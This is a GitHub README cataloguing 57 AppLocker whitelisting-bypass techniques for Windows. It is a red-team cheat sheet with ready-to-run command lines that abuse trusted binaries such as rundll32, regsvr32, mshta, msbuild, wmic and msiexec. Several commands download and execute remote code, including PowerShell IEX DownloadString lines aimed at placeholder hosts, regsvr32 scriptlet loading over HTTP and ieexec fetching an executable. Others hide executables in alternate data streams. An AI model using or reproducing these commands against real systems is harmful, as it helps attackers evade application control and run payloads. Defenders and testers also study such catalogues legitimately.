└── README.md /README.md: -------------------------------------------------------------------------------- 1 | # myAPPLockerBypassSummary 2 | Simple APPLocker bypass summary based on the extensive work of @api0cradle 3 | 4 | -------------------------------------------------------------------------- 5 | 1. Rundll32.exe 6 | 7 | rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');" 8 | 9 | rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()"); 10 | 11 | rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} 12 | 13 | rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test") 14 | 15 | rundll32 shell32.dll,Control_RunDLL payload.dll 16 | 17 | 18 | * Requires admin: No 19 | * Windows binary: Yes 20 | * Bypasses AppLocker Default rules: No 21 | 22 | Notes: 23 | I only tested on Windows 10 against the default rules, it could work against older Windows versions. 24 | 25 | * Links: 26 | * https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/ 27 | * https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7 28 | * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Rundll32.md 29 | * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ 30 | 31 | -------------------------------------------------------------------------- 32 | 2. Regsvr32.exe 33 | 34 | 35 | regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll 36 | 37 | 38 | * Requires admin: No 39 | * Windows binary: Yes 40 | * Bypasses AppLocker Default rules: No 41 | 42 | Notes: 43 | I only tested on Windows 10 against the default rules, it could work against older Windows versions. 44 | 45 | * Links: 46 | * https://gist.github.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302 47 | * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Regsvr32.md 48 | 49 | -------------------------------------------------------------------------- 50 | 3. Msbuild.exe 51 | 52 | 53 | msbuild.exe pshell.xml 54 | 55 | 56 | * Requires admin: No 57 | * Windows binary: Yes 58 | * Bypasses AppLocker Default rules: Yes 59 | 60 | Notes: 61 | 62 | * Links: 63 | * https://gist.github.com/subTee/6b236083da2fd6ddff216e434f257614 64 | * http://subt0x10.blogspot.no/2017/04/bypassing-application-whitelisting.html 65 | * https://github.com/Cn33liz/MSBuildShell 66 | * https://github.com/Cn33liz/MS17-012 67 | * https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/ 68 | * https://www.youtube.com/watch?v=aSDEAPXaz28 69 | * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Trusted_Developer_Utilities.md 70 | * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ 71 | 72 | -------------------------------------------------------------------------- 73 | 4. Regsvcs.exe 74 | 75 | 76 | regsvcs.exe /U regsvcs.dll 77 | 78 | regsvcs.exe regsvcs.dll 79 | 80 | 81 | * Requires admin: No 82 | * Windows binary: Yes 83 | * Bypasses AppLocker Default rules: Yes 84 | 85 | Notes: 86 | 87 | * Links: 88 | * https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/ 89 | * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs 90 | * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md 91 | * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ 92 | 93 | -------------------------------------------------------------------------- 94 | 5. Regasm.exe 95 | 96 | 97 | regasm.exe /U regsvcs.dll 98 | 99 | regasm.exe regsvcs.dll 100 | 101 | 102 | * Requires admin: /U does not require admin 103 | * Windows binary: Yes 104 | * Bypasses AppLocker Default rules: Yes 105 | 106 | Notes: 107 | 108 | * Links: 109 | * https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/ 110 | * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs 111 | * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md 112 | * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ 113 | 114 | -------------------------------------------------------------------------- 115 | 6. Bginfo.exe 116 | 117 | 118 | bginfo.exe bginfo.bgi /popup /nolicprompt 119 | 120 | 121 | * Requires admin: No 122 | * Windows binary: No 123 | * Bypasses AppLocker Default rules: No 124 | 125 | Notes: 126 | Will work if BGinfo.exe is located in a path that is trusted by the policy. 127 | 128 | * Links: 129 | * https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/ 130 | * https://oddvar.moe/2017/05/22/clarification-bginfo-4-22-applocker-still-vulnerable/ 131 | * https://pentestlab.blog/2017/06/05/applocker-bypass-bginfo/ 132 | 133 | -------------------------------------------------------------------------- 134 | 7. InstallUtil.exe 135 | 136 | 137 | InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll 138 | 139 | 140 | * Requires admin: No 141 | * Windows binary: Yes 142 | * Bypasses AppLocker Default rules: Yes 143 | 144 | Notes: 145 | 146 | * Links: 147 | * https://github.com/subTee/AllTheThings 148 | * https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/ 149 | * https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12 150 | * http://subt0x10.blogspot.no/2017/09/banned-file-execution-via.html 151 | * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/InstallUtil.md 152 | * https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/ 153 | * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ 154 | 155 | -------------------------------------------------------------------------- 156 | 8. MSDT.exe 157 | 158 | 159 | Open .diagcab package 160 | 161 | 162 | * Requires admin: No 163 | * Windows binary: Yes 164 | * Bypasses AppLocker Default rules: ? 165 | 166 | Notes: 167 | 168 | * Links: 169 | * https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/ 170 | * https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ 171 | 172 | -------------------------------------------------------------------------- 173 | 9. mshta.exe 174 | 175 | 176 | mshta.exe evilfile.hta 177 | 178 | 179 | * Requires admin: No 180 | * Windows binary: Yes 181 | * Bypasses AppLocker Default rules: Yes 182 | 183 | Notes: 184 | 185 | * Links: 186 | * https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4 187 | * https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ 188 | 189 | -------------------------------------------------------------------------- 190 | 10. Execute .Bat 191 | 192 | 193 | cmd.exe /k < script.txt 194 | 195 | 196 | * Requires admin: No 197 | * Windows binary: Yes 198 | * Bypasses AppLocker Default rules: No 199 | 200 | Notes: 201 | 202 | * Links: 203 | * https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_3 204 | * https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ 205 | 206 | -------------------------------------------------------------------------- 207 | 11. Execute .PS1 208 | 209 | 210 | Get-Content script.txt | iex 211 | 212 | 213 | * Requires admin: No 214 | * Windows binary: Yes 215 | * Bypasses AppLocker Default rules: No 216 | 217 | Notes: 218 | 219 | * Links: 220 | * https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_3 221 | * https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ 222 | 223 | -------------------------------------------------------------------------- 224 | 12. Execute .VBS 225 | 226 | 227 | cscript.exe //E:vbscript script.txt 228 | 229 | 230 | * Requires admin: No 231 | * Windows binary: Yes 232 | * Bypasses AppLocker Default rules: No 233 | 234 | Notes: 235 | 236 | * Links: 237 | * https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_3 238 | * https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ 239 | 240 | -------------------------------------------------------------------------- 241 | 13. PresentationHost.exe 242 | 243 | 244 | Missing Example 245 | 246 | 247 | * Requires admin: No 248 | * Windows binary: Yes 249 | * Bypasses AppLocker Default rules: ? 250 | 251 | Notes: 252 | 253 | * Links: 254 | * https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf 255 | * https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ 256 | 257 | -------------------------------------------------------------------------- 258 | 14. dfsvc.exe 259 | 260 | 261 | Missing Example 262 | 263 | 264 | * Requires admin: ? 265 | * Windows binary: Yes 266 | * Bypasses AppLocker Default rules: ? 267 | 268 | 269 | Notes: 270 | 271 | * Links: 272 | * https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf 273 | 274 | -------------------------------------------------------------------------- 275 | 15. IEExec.exe 276 | 277 | 278 | ieexec.exe http://x.x.x.x:8080/bypass.exe 279 | 280 | 281 | * Requires admin: ? 282 | * Windows binary: Yes 283 | * Bypasses AppLocker Default rules: ? 284 | 285 | Notes: 286 | 287 | * Links: 288 | * https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/ 289 | 290 | -------------------------------------------------------------------------- 291 | 16. cdb.exe 292 | 293 | 294 | cdb.exe -cf x64_calc.wds -o notepad.exe 295 | 296 | 297 | * Requires admin: ? 298 | * Windows binary: No 299 | * Bypasses AppLocker Default rules: ? 300 | 301 | Notes: 302 | 303 | * Links: 304 | * http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html 305 | 306 | -------------------------------------------------------------------------- 307 | 17. dnx.exe 308 | 309 | 310 | dnx.exe consoleapp 311 | 312 | 313 | * Requires admin: ? 314 | * Windows binary: No 315 | * Bypasses AppLocker Default rules: ? 316 | 317 | Notes: 318 | 319 | * Links: 320 | * https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/ 321 | 322 | -------------------------------------------------------------------------- 323 | 18. rcsi.exe 324 | 325 | 326 | rcsi.exe bypass.csx 327 | 328 | 329 | * Requires admin: ? 330 | * Windows binary: No 331 | * Bypasses AppLocker Default rules: ? 332 | 333 | Notes: 334 | 335 | * Links: 336 | * https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/ 337 | 338 | -------------------------------------------------------------------------- 339 | 19. csi.exe 340 | 341 | 342 | Missing example 343 | 344 | 345 | * Requires admin: ? 346 | * Windows binary: No 347 | * Bypasses AppLocker Default rules: ? 348 | 349 | Notes: 350 | 351 | * Links: 352 | * https://web.archive.org/web/20161008143428/ 353 | * http://subt0x10.blogspot.com/2016/09/application-whitelisting-bypass-csiexe.html 354 | 355 | -------------------------------------------------------------------------- 356 | 20. CPL loading location manipulation 357 | 358 | 359 | Control.exe 360 | 361 | 362 | * Requires admin: No 363 | * Windows binary: Yes 364 | * Bypasses AppLocker Default rules: ? 365 | 366 | Notes: 367 | 368 | * Links: 369 | * https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/ 370 | * https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/ 371 | 372 | -------------------------------------------------------------------------- 373 | 21. msxsl.exe 374 | 375 | 376 | msxsl.exe customers.xml script.xsl 377 | 378 | 379 | * Requires admin: No 380 | * Windows binary: No 381 | * Bypasses AppLocker Default rules: ? 382 | 383 | Notes: 384 | 385 | * Links: 386 | * https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/ 387 | * https://gist.github.com/subTee/d9380299ff35738723cb44f230ab39a1 388 | * https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker 389 | * https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/ 390 | 391 | -------------------------------------------------------------------------- 392 | 22. msiexec.exe 393 | 394 | 395 | msiexec /quiet /i cmd.msi 396 | 397 | msiexec /q /i http://192.168.100.3/tmp/cmd.png 398 | 399 | 400 | * Requires admin: ? 401 | * Windows binary: Yes 402 | * Bypasses AppLocker Default rules: ? 403 | 404 | Notes: 405 | 406 | * Links: 407 | * https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/ 408 | 409 | -------------------------------------------------------------------------- 410 | 23. cmstp.exe 411 | 412 | 413 | cmstp.exe /ni /s c:\cmstp\CorpVPN.inf 414 | 415 | 416 | * Requires admin: No 417 | * Windows binary: Yes 418 | * Bypasses AppLocker Default rules: ? 419 | 420 | Notes: 421 | Can also execute scriptlets - 422 | https://twitter.com/NickTyrer/status/958450014111633408 423 | https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80 424 | 425 | * Links: 426 | * https://msitpros.com/?p=3960 427 | * https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e 428 | 429 | -------------------------------------------------------------------------- 430 | 24. xwizard.exe 431 | 432 | 433 | xwizard.exe argument1 argument2 434 | 435 | 436 | DLL loading in same folder xwizard.dll 437 | 438 | * Requires admin: No 439 | * Windows binary: Yes 440 | * Bypasses AppLocker Default rules: ? 441 | 442 | Notes: 443 | 444 | * Links: 445 | * http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/ 446 | 447 | -------------------------------------------------------------------------- 448 | 25. fsi.exe 449 | 450 | 451 | fsi.exe c:\folder\d.fscript 452 | 453 | 454 | * Requires admin: No 455 | * Windows binary: No 456 | * Bypasses AppLocker Default rules: ? 457 | 458 | Notes: 459 | 460 | * Links: 461 | * https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1 462 | * https://twitter.com/NickTyrer/status/904273264385589248 463 | * https://docs.microsoft.com/en-us/dotnet/fsharp/tutorials/fsharp-interactive/ 464 | 465 | -------------------------------------------------------------------------- 466 | 26. odbcconf.exe 467 | 468 | 469 | odbcconf -f file.rsp 470 | 471 | 472 | * Requires admin: ? 473 | * Windows binary: Yes 474 | * Bypasses AppLocker Default rules: ? 475 | 476 | Notes: 477 | 478 | * Links: 479 | * https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b 480 | 481 | -------------------------------------------------------------------------- 482 | 27. te.exe 483 | 484 | 485 | te.exe bypass.wsc 486 | 487 | 488 | * Requires admin: No 489 | * Windows binary: No 490 | * Bypasses AppLocker Default rules: ? 491 | 492 | Notes: Can be used if the Test Authoring and Execution Framework is installed and is in a path that is whitelisted. 493 | Default location is: C:\program files (x86)\Windows Kits\10\testing\Runtimes\TAEF 494 | 495 | * Links: 496 | * https://twitter.com/gN3mes1s/status/927680266390384640 497 | * https://gist.github.com/N3mes1s/5b75a4cd6aa4d41bb742acace2c8ab42 498 | 499 | -------------------------------------------------------------------------- 500 | 28. Placing files in writeable paths under c:\windows 501 | 502 | The following folders are by default writable and executable by normal users 503 | 504 | C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys 505 | 506 | C:\Windows\System32\spool\drivers\color 507 | 508 | C:\Windows\Tasks 509 | 510 | C:\windows\tracing 511 | 512 | 513 | 514 | * Requires admin: No 515 | * Windows binary: N/A 516 | * Bypasses AppLocker Default rules: ? 517 | 518 | Notes: This list is based on Windows 10 1709. Run accesschk to verify on other Windows versions 519 | 520 | -------------------------------------------------------------------------- 521 | 29. Atbroker.exe 522 | 523 | 524 | ATBroker.exe /start malware 525 | 526 | 527 | * Requires admin: No 528 | * Windows binary: Yes 529 | * Bypasses AppLocker Default rules: ? 530 | 531 | Notes: 532 | 533 | * Links: 534 | * http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/ 535 | 536 | -------------------------------------------------------------------------- 537 | 30. WMIC.exe 538 | 539 | 540 | wmic process call create calc 541 | 542 | wmic process get brief /format:"https://www.example.com/file.xsl 543 | 544 | wmic os get /format:"MYXSLFILE.xsl" 545 | 546 | wmic process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl" 547 | 548 | 549 | * Requires admin: No 550 | * Windows binary: Yes 551 | * Bypasses AppLocker Default rules: ? 552 | 553 | Notes: 554 | 555 | * Links: 556 | * https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory 557 | * https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html 558 | * https://gist.githubusercontent.com/caseysmithrc/68924cabbeca1285d2941298a5b91c24/raw/8574e0c019b17d84028833220ed0b30cf9eea84b/minimalist.xsl 559 | 560 | -------------------------------------------------------------------------- 561 | 31. MavInject32.exe 562 | 563 | 564 | MavInject32.exe /INJECTRUNNING 565 | 566 | 567 | * Requires admin: No 568 | * Windows binary: Yes 569 | * Bypasses AppLocker Default rules: ? 570 | 571 | Notes: 572 | 573 | * Links: 574 | * https://twitter.com/gN3mes1s/status/941315826107510784 575 | * https://twitter.com/Hexacorn/status/776122138063409152 576 | 577 | -------------------------------------------------------------------------- 578 | 32. Pubprn.vbs 579 | 580 | 581 | pubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/api0cradle/fb164762143b1ff4042d9c662171a568/raw/709aff66095b7f60e5d6f456a5e42021a95ca802/test.sct 582 | 583 | 584 | * Requires admin: No 585 | * Windows binary: Yes 586 | * Bypasses AppLocker Default rules: ? 587 | 588 | Notes: 589 | 590 | * Links: 591 | * https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology 592 | * https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/ 593 | 594 | -------------------------------------------------------------------------- 595 | 33. slmgr.vbs 596 | 597 | 598 | slmgr.vbs 599 | 600 | 601 | * Requires admin: No 602 | * Windows binary: Yes 603 | * Bypasses AppLocker Default rules: ? 604 | 605 | Notes: Requires registry keys for com object. 606 | 607 | * Links: 608 | * https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology 609 | * https://www.youtube.com/watch?v=3gz1QmiMhss 610 | 611 | -------------------------------------------------------------------------- 612 | 34. winrm.vbs 613 | 614 | 615 | winrm quickconfig 616 | 617 | 618 | * Requires admin: No 619 | * Windows binary: Yes 620 | * Bypasses AppLocker Default rules: ? 621 | 622 | Notes: Requires registry keys for com object. 623 | 624 | * Links: 625 | * https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology 626 | * https://www.youtube.com/watch?v=3gz1QmiMhss 627 | 628 | -------------------------------------------------------------------------- 629 | 35. forfiles.exe 630 | 631 | 632 | forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe 633 | 634 | 635 | * Requires admin: No 636 | * Windows binary: Yes 637 | * Bypasses AppLocker Default rules: ? 638 | 639 | Notes: 640 | 641 | * Links: 642 | * https://twitter.com/vector_sec/status/896049052642533376 643 | 644 | -------------------------------------------------------------------------- 645 | 36. SyncAppvPublishingServer.exe 646 | 647 | 648 | SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX 649 | 650 | 651 | * Requires admin: No 652 | * Windows binary: Yes 653 | * Bypasses AppLocker Default rules: ? 654 | 655 | Notes: 656 | 657 | * Links: 658 | * https://twitter.com/monoxgas/status/895045566090010624 659 | 660 | -------------------------------------------------------------------------- 661 | 37. InfDefaultInstall.exe 662 | 663 | 664 | InfDefaultInstall.exe shady.inf 665 | 666 | 667 | * Requires admin: ? 668 | * Windows binary: Yes 669 | * Bypasses AppLocker Default rules: ? 670 | 671 | Notes: 672 | Only works on Windows 7? Windows 10 requires admin or digital signature 673 | 674 | * Links: 675 | * https://twitter.com/KyleHanslovan/status/911997635455852544 676 | * https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a 677 | * https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/ 678 | 679 | -------------------------------------------------------------------------- 680 | 38. Winword.exe 681 | 682 | 683 | winword.exe /l dllfile.dll 684 | 685 | 686 | * Requires admin: No 687 | * Windows binary: Yes 688 | * Bypasses AppLocker Default rules: ? 689 | 690 | Notes: No commonly made DLL example file 691 | 692 | * Links: 693 | * https://twitter.com/subTee/status/884615369511636992 694 | 695 | -------------------------------------------------------------------------- 696 | 39. Runscripthelper.exe 697 | 698 | 699 | runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test 700 | 701 | 702 | * Requires admin: No 703 | * Windows binary: Yes 704 | * Bypasses AppLocker Default rules: ? 705 | 706 | Notes: 707 | 708 | * Links: 709 | * https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc 710 | 711 | -------------------------------------------------------------------------- 712 | 40. Tracker.exe 713 | 714 | 715 | Tracker.exe /d .\calc.dll /c C:\Windows\write.exe 716 | 717 | 718 | * Requires admin: No 719 | * Windows binary: No 720 | * Bypasses AppLocker Default rules: ? 721 | 722 | Notes: 723 | Part of Visual studio. 724 | Requires TrackerUI.dll present in 1028 subfolder. 725 | 726 | * Links: 727 | * https://twitter.com/Sudhanshu_C/status/943011972261412864 728 | 729 | -------------------------------------------------------------------------- 730 | 41. .WSF files 731 | 732 | 733 | script.wsf 734 | 735 | 736 | * Requires admin: No 737 | * Windows binary: No 738 | * Bypasses AppLocker Default rules: ? 739 | 740 | Notes: 741 | .WSF files are supposed to not be blocked by AppLocker 742 | 743 | * Links: 744 | 745 | -------------------------------------------------------------------------- 746 | 42. PowerShell version 2 747 | 748 | 749 | Powershell -version 2 750 | 751 | 752 | * Requires admin: No 753 | * Windows binary: Yes 754 | * Bypasses AppLocker Default rules: ? 755 | 756 | Notes: 757 | Bypasses Constrained language mode 758 | 759 | * Links: 760 | 761 | -------------------------------------------------------------------------- 762 | 43. CL_Invocation.ps1 763 | 764 | 765 | . C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 766 | 767 | SyncInvoke [args] 768 | 769 | 770 | * Requires admin: No 771 | * Windows binary: Yes 772 | * Bypasses AppLocker Default rules: Yes, as long as PowerShell version 2 is present 773 | 774 | Notes: 775 | Requires PowerShell version 2 776 | 777 | * Links: 778 | * https://twitter.com/bohops/status/948548812561436672 779 | 780 | -------------------------------------------------------------------------- 781 | 44. Incorrect permissions on files in folders 782 | 783 | 784 | type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe" 785 | 786 | wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"' 787 | 788 | 789 | * Requires admin: No 790 | * Windows binary: Yes 791 | * Bypasses AppLocker Default rules: Yes 792 | 793 | Notes: 794 | 795 | 796 | * Links: 797 | * https://twitter.com/Oddvarmoe/status/951757732557852673 798 | 799 | -------------------------------------------------------------------------- 800 | 45. Control.exe -Loading DLL/CPL binary from Alternate data stream 801 | 802 | 803 | type notepad_reflective_x64.dll > c:\windows\tasks\zzz:notepad_reflective_x64.dll 804 | control.exe c:\windows\tasks\zzz:notepad_reflective_x64.dll 805 | 806 | 807 | * Requires admin: No 808 | * Windows binary: Yes 809 | * Bypasses AppLocker Default rules: ? 810 | 811 | Notes: 812 | Requires write access to a place that is allowed by AppLocker 813 | 814 | * Links: 815 | * https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/ 816 | * https://twitter.com/bohops/status/955659561008017409 817 | 818 | -------------------------------------------------------------------------- 819 | 46. Advpack.dll - LaunchINFSection 820 | 821 | 822 | rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1, 823 | 824 | 825 | * Requires admin: No 826 | * Windows binary: Yes 827 | * Bypasses AppLocker Default rules: Yes 828 | 829 | Notes: 830 | 831 | 832 | * Links: 833 | * https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/ 834 | * https://twitter.com/bohops/status/967486047839014913 835 | * https://gist.githubusercontent.com/bohops/693dd4d5dbfb500f1c3ace02622d5d34/raw/902ed953a9188b27e91c199b465cddf855c7b94f/test.inf 836 | 837 | -------------------------------------------------------------------------- 838 | 47. Advpack.dll - RegisterOCX 839 | 840 | 841 | rundll32.exe advpack.dll,RegisterOCX calc.exe 842 | 843 | 844 | * Requires admin: No 845 | * Windows binary: Yes 846 | * Bypasses AppLocker Default rules: Yes 847 | 848 | Notes: 849 | 850 | 851 | * Links: 852 | * https://twitter.com/Moriarty_Meng/status/977848311603380224 853 | 854 | -------------------------------------------------------------------------- 855 | 48. zipfldr.dll - RouteTheCall 856 | 857 | 858 | rundll32.exe zipfldr.dll,RouteTheCall calc.exe 859 | 860 | 861 | * Requires admin: No 862 | * Windows binary: Yes 863 | * Bypasses AppLocker Default rules: Yes 864 | 865 | Notes: 866 | 867 | 868 | * Links: 869 | * https://twitter.com/Moriarty_Meng/status/977848311603380224 870 | 871 | -------------------------------------------------------------------------- 872 | 49. url.dll - OpenURL 873 | 874 | 875 | rundll32.exe url.dll,OpenURL "C:\test\calc.hta" 876 | rundll32.exe url.dll,OpenURL "C:\test\calc.url" 877 | 878 | 879 | * Requires admin: No 880 | * Windows binary: Yes 881 | * Bypasses AppLocker Default rules: ? 882 | 883 | Notes: 884 | 885 | 886 | * Links: 887 | * https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ 888 | * http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/ 889 | 890 | -------------------------------------------------------------------------- 891 | 50. url.dll - FileProtocolHandler 892 | 893 | 894 | rundll32.exe url.dll, FileProtocolHandler calc.exe 895 | 896 | 897 | * Requires admin: No 898 | * Windows binary: Yes 899 | * Bypasses AppLocker Default rules: ? 900 | 901 | Notes: 902 | 903 | 904 | * Links: 905 | * http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/ 906 | 907 | -------------------------------------------------------------------------- 908 | 51. ieframe.dll - OpenURL 909 | 910 | 911 | rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url" 912 | 913 | 914 | * Requires admin: No 915 | * Windows binary: Yes 916 | * Bypasses AppLocker Default rules: ? 917 | 918 | Notes: 919 | 920 | 921 | * Links: 922 | * https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ 923 | * http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/ 924 | 925 | -------------------------------------------------------------------------- 926 | 52. shdocvw.dll - OpenURL 927 | 928 | 929 | rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url" 930 | 931 | 932 | * Requires admin: No 933 | * Windows binary: Yes 934 | * Bypasses AppLocker Default rules: ? 935 | 936 | Notes: 937 | 938 | 939 | * Links: 940 | * https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ 941 | * http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/ 942 | 943 | -------------------------------------------------------------------------- 944 | 53. ieadvpack.dll - LaunchINFSection 945 | 946 | 947 | rundll32.exe ieadvpack.dll,LaunchINFSection test.inf,,1, 948 | 949 | 950 | * Requires admin: No 951 | * Windows binary: Yes 952 | * Bypasses AppLocker Default rules: ? 953 | 954 | Notes: 955 | 956 | 957 | * Links: 958 | * https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ 959 | 960 | -------------------------------------------------------------------------- 961 | 54. ie4unit.exe 962 | 963 | 964 | ie4unit.exe -BaseSettings 965 | 966 | 967 | * Requires admin: No 968 | * Windows binary: Yes 969 | * Bypasses AppLocker Default rules: No 970 | 971 | Notes: 972 | Requires to copy out ie4unit.exe and ieuinit.inf to a user controlled folder. 973 | Also need to add SCT in the MSIE4RegisterOCX.Windows7 section 974 | 975 | * Links: 976 | * https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ 977 | 978 | -------------------------------------------------------------------------- 979 | 55. Visual Studio Tools for Office - .VSTO files 980 | 981 | 982 | evilfile.vsto 983 | 984 | 985 | * Requires admin: No 986 | * Windows binary: Yes 987 | * Bypasses AppLocker Default rules: ? 988 | 989 | Notes: 990 | You need to build a solution using Visual Studio Tools for Office. 991 | User needs to confirm installation after executing. 992 | 993 | * Links: 994 | * https://bohops.com/2018/01/31/vsto-the-payload-installer-that-probably-defeats-your-application-whitelisting-rules/ 995 | 996 | -------------------------------------------------------------------------- 997 | 56. Manage-bde.wsf 998 | 999 | 1000 | cscript c:\windows\system32\manage-bde.wsf 1001 | 1002 | 1003 | * Requires admin: No 1004 | * Windows binary: Yes 1005 | * Bypasses AppLocker Default rules: ? 1006 | 1007 | Notes: 1008 | Need to adjust comspec variable using: set comspec=c:\windows\system32\calc.exe 1009 | 1010 | * Links: 1011 | * https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712 1012 | * https://twitter.com/bohops/status/980659399495741441 1013 | 1014 | -------------------------------------------------------------------------- 1015 | 57. msdeploy.exe 1016 | 1017 | 1018 | msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\bypass.exe & pause" 1019 | 1020 | 1021 | * Requires admin: No 1022 | * Windows binary: Yes 1023 | * Bypasses AppLocker Default rules: Yes 